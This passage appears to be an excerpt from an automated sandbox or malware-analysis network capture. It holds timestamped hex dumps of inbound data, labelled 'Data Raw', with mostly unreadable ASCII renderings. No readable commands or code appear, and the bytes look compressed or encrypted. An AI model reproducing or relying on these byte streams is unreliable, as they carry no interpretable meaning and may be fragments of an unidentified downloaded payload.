                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2615INData Raw: c0 97 46 e5 f3 fa b8 e2 05 28 41 9f f4 64 a0 1c 29 80 a0 01 80 2f d3 5b 41 52 ba ef c0 e6 7c 5d 95 50 99 84 db 27 5c 03 d5 a9 90 78 92 18 45 81 44 70 0f 53 17 43 6e 03 73 66 df da 02 7e 5e 02 24 81 f3 34 f7 24 e9 03 06 46 49 7a 15 87 c7 90 42 92 fa 81 28 9b 8d 6e fc dd a2 1c e8 a8 aa 04 37 30 9f 14 54 68 01 75 01 03 3c 6f 8c d4 72 aa ac df c7 5a 9a 1a 11 77 a0 c2 6c 12 e2 d2 b5 f6 f0 49 55 98 b0 25 4a 4f 01 a8 ec a1 cf 73 89 f8 34 4d 88 71 8c 09 85 47 76 08 65 b7 ae 21 a8 18 54 08 9b 4a ca bc 3c f1 ce b0 19 97 3d 01 9c 8c 52 e9 6a 33 c6 83 d3 4c ac ed 9c c4 e6 fc 64 ce 7a 13 3c ae ef db e8 81 76 bf f9 ff 0a 89 55 7c 6c 42 a0 af 10 d6 7b 82 5d 2c 80 14 8f aa fa 5d f8 06 b5 72 70 62 6e 39 58 e7 dc 10 66 53 45 c5 3c 5c 29 05 28 ce eb bd 65 f2 32 e6 9e 24 6d
                                                                                                                                                                                                  Data Ascii: F(Ad)/[AR|]P'\xEDpSCnsf~^$4$FIzB(n70Thu<orZwlIU%JOs4MqGve!TJ<=Rj3Ldz<vU|lB{],]rpbn9XfSE<\)(e2$m
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2631INData Raw: 2c b8 00 d8 77 c9 dd fd ba 55 51 17 08 71 af bc 4b 8f 0d 25 c0 61 04 09 2b e0 b9 85 25 9b f7 c8 05 d8 52 f9 f2 01 79 7d 28 e8 29 1d 81 9e 3a 16 7f ea 48 13 08 88 51 23 04 a9 4d e2 ea e6 ed c4 4b f5 18 50 7b b0 bd 16 61 25 fc 73 fa ce 4e b2 8a 05 4b f8 e5 cb 9a ac a3 8c 37 18 4b 50 b1 54 27 4c 5e a3 22 af 3d f8 05 5c f5 56 f1 61 56 fe 18 e7 c8 39 93 6a 26 3e 20 80 7f 90 1f 5c 48 0c 35 59 0b 31 ae a6 65 5a 3c ef a5 21 44 ff 9f a3 41 3d 19 94 81 77 dc 01 b2 31 eb ca 2c 2f b6 00 23 63 35 bf d1 43 1f 01 21 2d 55 b2 c5 c4 e2 28 05 62 e0 b5 f4 bd 2d 55 90 c5 15 e8 28 41 07 f9 29 f9 61 f4 07 cf b9 3e 70 70 dc 44 47 0b a7 e7 6c da f7 16 d9 16 32 c9 fe b2 7d 8b 9e c5 a7 10 7b c4 3d 75 05 98 2b aa 91 59 3a 9b 40 06 f6 2a ad 9d 05 e4 91 e0 ad 5e 70 2e c5 21 c7 f5 b9
                                                                                                                                                                                                  Data Ascii: ,wUQqK%a+%Ry}():HQ#MKP{a%sNK7KPT'L^"=\VaV9j&> \H5Y1eZ<!DA=w1,/#c5C!-U(b-U(A)a>ppDGl2}{=u+Y:@*^p.!
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2647INData Raw: df a0 69 bb 87 ef 37 bd e6 a8 9d 4a 40 f7 95 b4 a5 7f 9c 1f b7 79 03 49 dd 46 6b bd 45 1f 4b e7 2c 8a 51 68 06 13 59 af d5 f4 fd 2e a4 eb a6 c7 d6 12 5f ff 8e 52 d7 ca 22 c9 58 75 47 aa c8 a9 85 e9 35 b6 ef 3c b2 1e 5f a9 db a9 c2 8e df fd 77 e5 80 40 66 8c db e9 5e 3f 11 2c c4 78 5a ed 01 f8 3b 6c 5e e5 6b 3c 5d b8 21 d7 fd a5 c6 6a 02 37 ac e0 c1 d8 19 10 69 a2 cb 1c 61 18 43 2b cb 9d a1 a6 0c e0 fe 0d 2b af 28 bd 7f 86 31 e3 0f 30 fa bd 2a fd ca 16 2b 98 21 d9 39 8f 08 1e 16 ec 60 ed 95 bb 09 c8 c9 50 7e 00 0c 50 49 77 f3 d6 46 44 c4 3c 78 83 01 36 a3 56 84 40 83 39 85 e9 61 3a 76 b2 13 db 6f c5 02 fb dc f4 66 2c ea f9 f5 80 82 e7 50 fd e4 e6 00 3e c5 9e 7c 48 6b 9a 19 1f 73 77 ae 66 5c 0d 96 13 4c e1 b9 32 5c 5b f7 4c c6 c0 0f d1 00 f6 9b da df ae 82
                                                                                                                                                                                                  Data Ascii: i7J@yIFkEK,QhY._R"XuG5<_w@f^?,xZ;l^k<]!j7iaC++(10*+!9`P~PIwFD<x6V@9a:vof,P>|Hkswf\L2\[L
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2663INData Raw: 3b f8 c3 bd 02 1c 57 a3 85 55 16 a2 4a fe e8 74 95 77 15 8a 25 d5 1e ee 3d e9 b8 4f f8 1a f1 39 76 2b be 6e 66 10 09 24 b9 3f 8c 9a f1 41 62 41 7c 4c e1 78 a6 c4 1c 01 eb db 68 10 f0 2e 12 2d 57 b8 69 b5 a9 84 d4 cc 1b 10 99 14 a0 f7 02 fa 25 a4 3b 68 80 d3 db c0 9c 9b c8 c1 bc e9 4a 77 b3 a9 13 d4 be ba 60 8c 2b 6b ce 12 20 2f d7 bc 07 a4 ae 31 25 36 eb 7c c0 34 d7 e4 c0 f9 b2 e8 5c b8 47 bd f4 38 62 2a 28 10 a6 74 a1 a0 3d 74 89 8f 60 c5 60 97 c2 1e 89 4e 59 a8 a2 e0 87 79 fd 86 9f 76 fc f0 af 79 80 1e 6d 00 ad 1a aa b8 95 b5 94 d1 99 24 00 6e ca 7d 8e 85 8d 2d d0 5b f5 94 ba 3d 1e 18 d7 0c 14 d3 75 7c 48 08 4e be 09 9c 3e c5 6f 2f df b5 38 1f d2 70 78 38 67 4b 01 57 1a 3e a8 aa 40 2f 4a 48 0b 68 9e fe 45 98 12 72 e8 93 4a f9 ae cf 7a 11 5f fb 31 00 b6
                                                                                                                                                                                                  Data Ascii: ;WUJtw%=O9v+nf$?AbA|Lxh.-Wi%;hJw`+k /1%6|4\G8b*(t=t``NYyvym$n}-[=u|HN>o/8px8gKW>@/JHhErJz_1
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2679INData Raw: 14 fd f8 be bf 40 64 b0 3b 95 42 2e fc aa 9a a0 28 7d 76 1f e7 e2 af 71 25 22 76 90 70 86 19 46 fc c4 54 5e 68 8d 47 9e 84 0f ab 45 06 01 a3 f5 05 97 c5 a2 44 ef ca 34 81 c1 73 8b 76 2b 3b fc 30 52 3d 99 4a a2 5a 4e aa 34 a7 b7 b7 02 68 84 bb 65 57 cd e0 c9 42 f3 77 3e 6f da b2 56 d7 45 b8 26 59 45 57 ae a3 43 b1 e9 a0 7a f6 8c 4e 12 fe af e2 83 b4 ba cf c4 4e ec bd a8 68 09 f0 02 c0 3f 7f 45 6e cb 77 1e 03 90 40 12 6f 2e 1a 98 7b f2 b7 fe 6c 8c c9 02 0c 23 09 a5 7d 79 08 24 81 f7 e0 e9 33 b5 02 ce dc 8b dd 45 43 9d b0 d1 fd 63 28 be 31 3e 10 19 00 ab 12 fe 67 1d c2 4b 60 51 40 f5 d6 86 4a 9d e5 03 88 93 f3 43 61 6b 12 14 3c 54 af c8 08 04 02 18 df 44 d5 f1 fc fe 19 0c a7 ee 50 7b 42 c6 50 ff 5a 5f 4c f8 f8 d8 50 cb 46 b7 48 95 2e 64 0c 69 12 72 53 28 83
                                                                                                                                                                                                  Data Ascii: @d;B.(}vq%"vpFT^hGED4sv+;0R=JZN4heWBw>oVE&YEWCzNNh?Enw@o.{l#}y$3ECc(1>gK`Q@JCak<TDP{BPZ_LPFH.dirS(
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2695INData Raw: 64 de 14 60 06 c1 83 47 5e db 97 20 cc ed ef 54 f7 75 13 b7 d4 f6 0c 41 47 78 2d 72 a0 50 83 30 b3 64 4b 44 6b ff 20 7a 67 9d c9 4f 0d ac b0 c4 55 7e 04 18 37 ba 71 6c ce 3c 00 72 c2 7c 13 50 6d db aa a7 63 84 5c 04 a0 1a 18 5e 0b 22 38 97 23 86 ae 5b e4 ea 13 5a fb 31 ce a6 55 29 ca 27 76 d4 a0 c5 4b 71 3c 0e 01 08 62 60 d8 14 14 6e f3 c3 05 4b ea 30 c4 1f 1c ef 81 d3 10 08 7a c9 2f 47 46 3d 4d 92 03 14 8e 7c ec 5b bc c8 0f d5 70 92 b8 6e 20 a5 d4 24 aa 5e 32 82 f3 37 a6 9a fd 71 9d c7 4c 0b 53 5a 70 72 eb 97 e5 b0 65 1c ed 2a 89 6e c0 18 a0 ee c0 40 34 65 60 3a 97 2f 18 48 59 3e 88 aa 05 61 17 87 fe 6e a2 21 80 8e f5 a0 c0 90 97 09 c1 7d f0 fb 0c a1 6e d4 bf 74 95 1e 56 18 7f d7 f9 d3 1a ca c0 13 8d 09 01 77 e1 a4 52 6f 4a 50 6f 03 22 57 10 78 60 30 80
                                                                                                                                                                                                  Data Ascii: d`G^ TuAGx-rP0dKDk zgOU~7ql<r|Pmc\^"8#[Z1U)'vKq<b`nK0z/GF=M|[pn $^27qLSZpre*n@4e`:/HY>an!}ntVwRoJPo"Wx`0
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2711INData Raw: 42 19 96 25 81 8e 98 99 58 04 60 02 23 95 53 19 aa 5a 44 a4 fd 93 4a 40 ee 4c 99 62 14 c9 60 ac 7c aa c6 1f 36 1d 87 a3 a1 4b 39 ba 7c 8d 59 59 d7 4c c4 0d a4 8e 0f 17 b7 c9 fa 6f 35 0b 35 77 ff 75 4f fd 8c f9 8c fa 4a 12 d7 20 89 bb 03 c5 a7 1d 6d 17 a9 95 42 ac e5 14 f9 1a 95 87 7e 49 04 80 00 42 12 15 2c ca 53 03 a6 1d 2a c7 61 04 bd 15 91 f0 84 3b 12 9f 3a e6 d0 71 88 35 ac 1d 12 d5 3f dc bc 2d 14 c1 05 26 41 d1 f4 50 fa 08 25 a3 08 e3 61 06 79 6c 76 50 c0 16 25 34 49 ee ce 12 ac 65 a8 06 38 cd 7e 2a 09 70 43 38 40 66 77 13 36 48 0c ad 35 84 c1 a6 06 d9 6e 10 12 b7 a2 3d e0 51 33 bf 80 42 4e 7f e0 ba 95 18 0b c4 2d 14 5c 13 2b ab 8b 1a 57 00 f4 eb 58 34 ec ab ab e2 08 74 f8 16 01 a0 98 6e 48 38 2f c9 22 5e 9e 09 4a b4 d0 e6 5e a0 0c 7b 66 29 72 76 65
                                                                                                                                                                                                  Data Ascii: B%X`#SZDJ@Lb`|6K9|YYLo55wuOJ mB~IB,S*a;:q5?-&AP%aylvP%4Ie8~*pC8@fw6H5n=Q3BN-\+WX4tnH8/"^J^{f)rve
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2727INData Raw: bb 57 89 c2 5f 52 60 41 f6 23 e6 82 2f b1 fc 76 1e dc 38 1e 0d 42 b0 5e 44 1d 1c 6e 60 7a 85 cc 9c f5 a7 d5 19 3c 5e cc e4 78 52 18 8c 3d 10 ce ab 25 de 71 75 10 6b 83 dd 4a fe 8e 57 1a 6a b4 fc fb 39 e8 1e 50 cc 13 9f f1 78 70 13 10 9a 22 3b 7d 07 31 db 14 78 52 c2 fd fa 60 0a 14 70 6d 5e f8 40 77 3a f7 ec c2 c8 41 83 ee d0 32 4e 18 be cc e4 5a 88 9a 36 82 f7 70 f2 5e 43 bb 57 ec a3 ba 4f b4 9f 01 12 c1 2a eb 21 e3 8e 3f c1 80 10 37 7e 38 49 68 f4 8a 9f 11 62 8e 31 28 90 70 2c 95 8f 2d 7d 34 18 14 88 d0 fe ae ad 3a e8 7a e2 7e 55 e2 10 75 d0 7a 0e 41 cc 6a 59 6a 60 38 50 75 4e b5 d6 d4 dc 09 92 c4 fd ff 59 5b 58 98 fd d7 d8 a7 26 1e 26 3f fe 41 ef c5 e9 c2 0f a4 29 4c 24 5d 32 c6 e6 19 02 d5 b6 37 e6 06 e8 5e 3e 3c 20 71 0b 70 63 5d 38 00 52 dd f6 d3 05
                                                                                                                                                                                                  Data Ascii: W_R`A#/v8B^Dn`z<^xR=%qukJWj9Pxp";}1xR`pm^@w:A2NZ6p^CWO*!?7~8Ihb1(p,-}4:z~UuzAjYj`8PuNY[X&&?A)L$]27^>< qpc]8R
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2743INData Raw: ff 42 f8 60 66 6d 4b 20 f6 f3 76 95 9e 52 58 d4 53 5a ff ef 6b 1a 0b 70 75 01 f7 15 0d 2d 16 a0 43 5d 13 0c 8c ec 7a 88 59 02 b7 a2 c4 78 74 23 2d c4 2a 44 38 c2 c2 29 72 65 be 4b ec e8 f0 c4 23 80 06 a7 91 54 c7 a2 08 42 13 59 c6 84 02 55 68 f4 97 e0 7b 58 a9 9d 77 b4 ad 97 57 17 b9 91 e9 92 be 90 b2 6c 08 45 97 f6 e7 c0 d0 d9 b6 68 8a f9 c9 96 57 e9 2f 81 c3 e1 15 6a 2b b3 f0 96 bc 14 ad 38 ad 5f 2f c4 4b f1 43 2e bd 5d e9 7a 8a 10 d2 d9 22 6a 29 7c 2f b5 25 1f 1c 4e a8 9d e0 ab 7f e8 9d 94 89 5a 31 e0 06 ab 25 f0 d2 00 9c 44 a7 70 c1 09 dd 87 a0 e0 ff c5 4d 27 46 89 f3 00 f1 03 e5 97 dd 3c 84 30 06 02 38 6d 01 6f 4c 68 f0 3b 2c 18 e8 09 18 33 fb 91 3c 0b 4b bb 7c 7f 81 95 17 0f 0a d5 7a cc 0c 5c a4 11 0c 18 6c 6f 9e 48 b6 e0 10 4d a9 9c 1c e8 f3 82 3d
                                                                                                                                                                                                  Data Ascii: B`fmK vRXSZkpu-C]zYxt#-*D8)reK#TBYUh{XwWlEhW/j+8_/KC.]z"j)|/%NZ1%DpM'F<08moLh;,3<K|z\loHM=
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2759INData Raw: f7 85 fa 17 54 a7 a0 25 04 7e d6 25 f7 33 64 a8 a5 75 3d 0b 9e ba 4c 80 55 e7 b2 0d 01 b5 70 6a b8 b2 4e ff 9d 35 3b fc f7 a4 ee b2 e0 d4 b9 a3 50 04 09 68 0e cc 44 a6 f2 2d 53 30 73 5f f1 23 73 4b 25 64 21 9f 2a ed 9a 02 6c 60 47 14 75 65 66 69 5f c5 0c 27 d6 fa fa 7d d1 40 d2 75 f3 67 49 f5 ce e2 97 f5 bc 0e 7c 8b 95 f1 5e 5a f4 64 69 db 05 04 41 fe e4 8f e6 1f ea 26 ff 4a ba 9a 4a 85 46 dd 68 1e 12 4a dd be d8 38 32 10 95 4c a2 17 ca a4 d1 94 68 dd 8e 14 ea b5 17 ea 9c bc f4 6e 34 2c 8b 74 f5 cf f0 08 6c 30 31 50 b8 48 6a b3 58 63 8c d2 78 04 14 36 0f ba e9 bb e7 00 86 08 2a 14 4a 98 38 24 49 5a 04 cc 7e 8e ae 50 43 b6 14 f2 94 9c 27 10 5b b4 08 e7 e0 08 98 95 00 09 65 d7 b5 b6 17 58 bf c4 00 55 a9 f4 e4 e7 ec 6d 5b db 28 24 32 a8 3e ba 90 c2 15 13 6e
                                                                                                                                                                                                  Data Ascii: T%~%3du=LUpjN5;PhD-S0s_#sK%d!*l`Guefi_'}@ugI|^ZdiA&JJFhJ82Lhn4,tl01PHjXcx6*J8$IZ~PC'[eXUm[($2>n
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2775INData Raw: 18 5e df f6 32 b0 3c 55 02 1c 0d e7 55 db 64 c9 d7 16 b8 9c 5c 59 2a 38 4a 2b e3 28 92 31 c8 7a 80 62 71 88 20 a7 80 8e 39 d6 f4 d3 77 52 0a 9c 59 ee 40 b8 70 c8 54 00 2b 19 0c 0a c1 40 c0 e6 26 b6 bf 78 f0 8a b8 85 27 7d ef 52 0b c2 21 29 5c de c2 70 5e 64 93 fe 24 62 04 f0 f5 10 f0 30 12 27 a3 4f e4 1c 4f 48 f0 98 a5 09 9c 08 98 27 c8 d6 64 0c f2 09 21 11 fe 88 2c cb 05 ca 63 2b af e0 30 cc a0 96 2e 95 ea ad 26 e0 b2 44 73 dc 31 9a 48 97 58 15 30 d0 dc ae fd 97 f5 1a 7c c4 d0 0b e8 fc 4d a7 f6 78 b8 24 b6 88 a7 5e 0a 1a f4 3c 65 80 8c 02 2e 68 0a 14 d6 d2 dc e4 02 4f a6 62 aa fa c8 8c 18 8a 80 fe e4 bd 7c 5a 67 b6 c0 26 7b 89 34 b7 d6 d6 d1 83 04 e9 ea 67 28 d5 92 72 3f 11 5a 3b f3 27 1f b2 52 b8 02 68 f5 b1 7c 51 7f 71 0a 3b 82 b9 c1 e7 70 12 f5 ce 4f
                                                                                                                                                                                                  Data Ascii: ^2<UUd\Y*8J+(1zbq 9wRY@pT+@&x'}R!)\p^d$b0'OOH'd!,c+0.&Ds1HX0|Mx$^<e.hOb|Zg&{4g(r?Z;'Rh|Qq;pO
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2791INData Raw: 35 5d f5 e8 9c 58 cc 13 f1 5f af 3c d6 18 46 c6 13 b4 22 dc 5a e2 86 17 fe 53 fd 3c 54 e2 86 ec ff 80 c2 f0 b5 e5 92 89 35 11 55 65 20 0c fa 90 19 d7 00 0a 79 c3 e2 fd 58 d4 c5 e9 3a 28 dc 80 00 be 34 f1 e6 27 fa c9 06 02 2c 21 4d 08 1a 23 57 66 f8 f2 af 4c 26 36 84 68 81 c9 44 01 ea 8a c7 9e 2e 27 40 16 1d 78 36 72 f4 9f 56 88 f0 8e cd 43 fd c2 2e d0 fc 36 23 64 39 41 80 28 ff 7c b2 a9 02 e2 dc d8 32 97 75 8a 2e 8e 03 c8 b7 c2 17 27 44 23 82 02 be ef 5f 38 68 22 21 30 d4 02 28 54 77 4e 05 6a 2f 09 b6 c1 be 2c 87 93 41 2a 3f e9 00 8b c9 e5 56 10 9b c6 7a a2 38 e6 fe b7 28 86 bc 18 a4 11 f7 21 01 19 79 e9 c2 35 51 08 f5 5f 3b 23 32 10 c9 a7 7e 09 35 68 dd a1 6e 20 a0 89 e0 93 06 38 ea 9d 2e 3d 70 79 13 31 19 c4 6c 18 2c 02 6c c8 0a b2 4d 59 69 2a 14 49 de
                                                                                                                                                                                                  Data Ascii: 5]X_<F"ZS<T5Ue yX:(4',!M#WfL&6hD.'@x6rVC.6#d9A(|2u.'D#_8h"!0(TwNj/,A*?Vz8(!y5Q_;#2~5hn 8.=py1l,lMYi*I
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2807INData Raw: c0 36 ee fc 19 10 7b f6 02 10 e7 e6 12 0d 4c d1 1a d7 af 2b df 30 18 b6 b9 58 6a f7 99 70 00 eb 31 c6 bc 49 33 20 02 40 12 42 95 46 0b 53 f2 00 df 3f 2f 10 97 c0 50 e6 72 ac aa 35 26 92 a9 38 98 a6 1b 73 98 f4 bf 97 d9 c2 89 04 ca 90 1e ba b1 bd 69 76 97 2f 05 12 b6 53 af 8c f6 57 e7 a5 18 55 10 72 45 2c b9 30 12 39 80 59 3d a5 9b 2e f5 10 30 88 6d 95 00 ed e6 c0 f0 6f 93 03 8d 97 87 e8 d2 09 29 4c bf 8c b1 4c 55 96 07 20 03 a2 f0 1c 95 83 b2 bf 36 e4 0b a0 75 44 75 31 d1 89 3c 37 0e c3 85 bf 72 98 7c 7e b2 27 de 86 e9 d7 9e 1a 55 66 8e 6a d1 a0 78 e6 83 10 34 4d 4a 9c 03 2c 7c 47 c0 dd 8a c2 7e f7 7a 28 9c 16 47 13 c0 fb fe ff 67 09 dd d5 ca 0f 96 d0 43 42 10 0f 0c 4e 9f a0 4a 4e cc 6f 00 2a 0f e4 ba 16 7e 12 0c 87 4e 19 1c 32 e9 30 02 ef 28 80 bf f0 31
                                                                                                                                                                                                  Data Ascii: 6{L+0Xjp1I3 @BFS?/Pr5&8siv/SWUrE,09Y=.0mo)LLU 6uDu1<7r|~'Ufjx4MJ,|G~z(GgCBNJNo*~N20(1
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2823INData Raw: 1f 04 d8 01 25 42 9a 70 d0 31 b8 0a 40 d5 7b 48 0c d9 b7 00 61 0b 7d 92 01 31 c7 81 3c e1 a1 2b d0 ec 6c c8 e2 62 73 a0 28 3e 52 aa 25 58 06 d3 1a 0f ac 4c 64 cd 19 f2 05 c2 16 3e 01 21 22 7e 54 73 10 c5 14 44 a9 99 c9 9c 5d 71 aa ad 76 96 78 ec ac 4e ff ee 9c d5 9a 42 d6 2d b0 67 95 3d 51 89 14 3c bf 3c cc f9 46 c3 62 78 6b c5 55 66 e0 bd c8 fc d9 e5 e1 15 a9 73 11 db 8c 86 f6 8e f0 0b ba 81 94 eb df 3e 8e 54 be 86 44 9c 28 70 50 36 9d 71 61 e9 7e 88 58 36 f9 8c 60 06 21 d1 45 ae 48 9d 54 1e 02 e3 97 8f 37 c7 42 09 1d 8b d6 f2 de 13 bc 9a fc bf 2a 52 16 4f 20 e8 1a b2 12 dc f1 02 d5 04 5c 8c c0 ba 75 45 4f b8 a0 64 8d 27 51 c9 f1 2a 08 c6 44 31 3c 0d fc c2 fd e5 36 08 a5 8b 49 df 47 be 16 a0 e1 fd 3b e8 be 4e ea 8e 02 34 80 29 ee a8 02 4a bf 78 96 07 5a
                                                                                                                                                                                                  Data Ascii: %Bp1@{Ha}1<+lbs(>R%XLd>!"~TsD]qvxNB-g=Q<<FbxkUfs>TD(pP6qa~X6`!EHT7B*RO \uEOd'Q*D1<6IG;N4)JxZ
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2839INData Raw: 2e 8b 25 f5 71 72 c7 ae b4 01 30 dc da d7 12 87 5a 5f 27 24 40 f1 1a a9 7c 16 07 dd 50 b8 71 b4 00 ca 2b 56 23 7f 13 39 53 6f 94 8f 81 82 17 42 6e 92 3c a8 20 61 85 36 ac 80 0a 12 cc 7c 4a 11 f6 52 0d ff 18 ec 53 08 8d 02 31 e2 75 50 ab 69 82 84 70 a3 8c ef d8 5a 18 85 93 f3 18 f1 11 90 43 4a 02 f8 f6 a1 16 1a 3a 43 ac 2e 25 43 e1 21 1d 6c 04 e3 b4 85 fe 9b 56 83 f8 f5 01 84 6d fe 02 b2 7b 76 ac 80 c6 6b e6 06 d8 6f 71 45 81 40 f0 68 0f 0b b6 29 54 90 56 41 cf a9 eb 87 8a 41 84 2c fb ad f5 85 dd 5b bf a3 31 8b 3c 56 60 c9 81 9e bb f6 45 0c 59 95 62 0c d5 16 07 79 e9 9f d9 9f 49 d5 16 f7 fe dd 30 27 3f b3 57 bf fe 12 c6 4a 51 ac 67 ac 56 13 be 29 8f 80 93 e6 ae c2 7b de c1 0c c3 b8 76 13 00 2e d9 f8 d3 24 02 79 80 af ed 41 5c 5e 3f 34 4f fe ca 18 c4 89 e1
                                                                                                                                                                                                  Data Ascii: .%qr0Z_'$@|Pq+V#9SoBn< a6|JRS1uPipZCJ:C.%C!lVm{vkoqE@h)TVAA,[1<V`EYbyI0'?WJQgV){v.$yA\^?4O
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2855INData Raw: 00 a1 91 46 98 25 42 88 3e 78 d9 4f b7 40 0c 36 ea e4 9c 7b 38 19 c6 f0 95 de e2 e9 10 5c 5d ca b6 60 40 12 15 b5 c0 43 fe 1c eb ed 21 02 09 99 e6 2b 91 9c 40 7a 01 00 02 38 c5 7d 20 7f 95 40 e0 5a 3c e9 4f 93 a2 d9 1d 0a cd 94 46 3a dd ef f9 9d 80 0f 68 50 32 40 e7 bc 0c 8c 97 82 a8 5c 87 4a 9d ec 33 d7 ba 02 08 f0 e1 8d 20 a7 eb 9c 08 4f 12 a2 d9 1e a3 4d 57 cd e1 28 ad 12 73 51 88 f3 ea 0c 3b 22 80 11 b5 d8 22 e2 2a 00 d1 2f e4 40 ed 41 6b f3 25 dd 97 a0 da 69 11 cb 42 18 09 e5 bd 19 4a d7 27 f4 37 80 88 a7 a4 63 02 98 7a bd 83 34 66 41 f7 00 4d 94 f7 c5 c5 78 88 dc f9 18 27 a8 d7 23 1c f2 e3 84 49 10 57 66 6e 2f df e6 79 fa ad 7d 80 3b e8 ed dc 9b 95 5c 52 49 74 9a 63 0b 99 84 be fd da c4 13 44 ff e2 4d 31 15 11 d8 66 3b e9 29 e1 3c 38 21 c6 3b ec c3
                                                                                                                                                                                                  Data Ascii: F%B>xO@6{8\]`@C!+@z8} @Z<OF:hP2@\J3 OMW(sQ;""*/@Ak%iBJ'7cz4fAMx'#IWfn/y};\RItcDM1f;)<8!;
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2871INData Raw: 57 f4 d6 7e b7 d3 98 49 57 d9 39 d1 5b 3f 9e 9d 5f ae 3e 37 5e b6 c7 d6 fa da 38 7e 82 d5 65 9a 80 e9 d9 e6 e7 ff 1c b7 7b 37 1f fa 20 20 ac 75 00 34 63 ec b0 1a 12 3d cb c0 14 c3 bf ba eb c5 4b a9 ab d8 02 3c 40 23 5c b0 ee bd 00 3b b9 12 6b d2 9f 22 fb 5b 57 7e b9 62 c8 23 7a e4 69 d5 dc 74 17 01 3c dd cc be fd 25 ec 3a e8 81 1f 16 19 d3 e0 bc cd 00 95 e4 61 4b fd 8d 1a 3e 6f 65 4b 28 b4 49 70 64 97 df bb a6 18 ac 9c df 34 f6 9e 25 af eb df 10 bd 18 e6 25 4b 5f 7c 0d 02 f1 27 16 01 02 a6 29 d5 11 af 80 2e a1 d0 2a ae 38 a4 a0 69 33 64 f7 e4 e7 2d 5a 41 fc 72 78 4a 3a 82 76 5d 79 77 6e 84 16 ed 5d 13 ff c2 af 2c 01 37 4e 6d e8 ed b0 e9 06 2e 90 15 eb fd 4c 80 d4 03 57 a7 a4 d9 7a 5f 18 e9 95 84 38 a1 06 87 1a 2c 00 72 a5 be f5 a7 06 af f0 30 c6 e7 b0 11
                                                                                                                                                                                                  Data Ascii: W~IW9[?_>7^8~e{7 u4c=K<@#\;k"[W~b#zit<%:aK>oeK(Ipd4%%K_|').*8i3d-ZArxJ:v]ywn],7Nm.LWz_8,r0
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2887INData Raw: 78 e4 76 a7 1e 8b cb 66 57 b7 71 82 e9 12 fd ff 15 20 ce 20 2b 61 00 63 5b 84 0b 69 12 45 60 c0 b8 9b b7 30 6e 2a 02 23 74 0e c3 a4 bf 43 7b a8 9e 44 06 31 70 04 2a 5f 2f fd c0 8c 4a 8e 71 5e 1f 9f 5e 3d 1f 9c 80 cd 1d 95 b3 97 1c b1 0c e5 7b 68 78 36 46 38 96 14 8d 0e b8 63 97 91 93 8a b1 71 a0 65 83 7a 30 fb fc 8b 1a 24 b3 40 80 a8 74 26 3e 38 94 0f f7 58 89 56 2f bc 8f e0 83 c2 f1 e1 e1 46 18 2b bc 3e 0e c8 f9 03 12 0a fe 71 a8 89 1f 2a 80 5d 20 f8 ab cb 9a 8a 1c 94 49 f9 59 eb 24 ef de 7a 60 09 d2 76 67 20 e3 3d c0 33 3f 69 4b 3c bf cf c3 75 bd f4 d0 50 68 4d 38 3f 3d 5f b8 ad b4 ef 89 80 3b ae 79 91 1d 1f 3a e8 2a a3 56 88 be 99 91 f8 77 bf 54 3c d2 71 6c 6c ac a7 ec 78 d2 55 ab e6 31 e0 68 3f 4c 34 35 03 67 bb f8 4a b4 ee b2 bd a5 fa cf f7 d3 bf a2
                                                                                                                                                                                                  Data Ascii: xvfWq +ac[iE`0n*#tC{D1p*_/Jq^^={hx6F8cqez0$@t&>8XV/F+>q*] IY$z`vg =3?iK<uPhM8?=_;y:*VwT<qllxU1h?L45gJ
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2903INData Raw: 54 7a c4 55 aa 28 74 be 0b 37 d5 70 49 77 6e ea bd 09 fd d5 1f 00 17 14 b6 f4 d7 a3 cf e4 de 87 c0 53 68 3c 9d c5 5a 5f 99 ef 2a ca 6b d3 ab cb c3 42 03 04 e9 63 b1 e4 bb f7 a3 cb e3 d0 01 73 cb 9d 36 9d 24 fe f5 cd 08 cf 72 09 dc 83 66 a1 33 bb df 20 ba e7 41 16 cf 2d 62 9d 00 ea 0c 4d 7f a5 76 06 5a 9e fc 49 b1 41 53 84 30 66 4c 8e f0 65 d1 16 45 31 be a0 2e c5 60 3b 6f 03 d0 2b 74 4a e5 a4 0e 7d c5 76 ff be a8 2c 5e e7 00 09 32 e4 fe 57 f3 50 a9 8a c2 6e e2 6f 20 42 ce 03 f5 95 76 89 d6 a9 69 d8 f0 6e 87 78 84 1a c8 70 48 f9 e4 b9 c1 04 f1 09 e5 72 65 af b2 39 20 7d 07 12 b6 78 62 8b 36 cd 50 f6 75 06 43 3d 70 2f f3 60 25 d7 26 40 3d ec a6 b7 a8 a8 84 00 8d 7e b2 5f fb 18 9d df 1c 2e 23 de dd 00 8d b2 8e 23 04 9b 4e 05 04 76 3f 1c 01 b9 bb 96 ec 89 14
                                                                                                                                                                                                  Data Ascii: TzU(t7pIwnSh<Z_*kBcs6$rf3 A-bMvZIAS0fLeE1.`;o+tJ}v,^2WPno BvinxpHre9 }xb6PuC=p/`%&@=~_.##Nv?
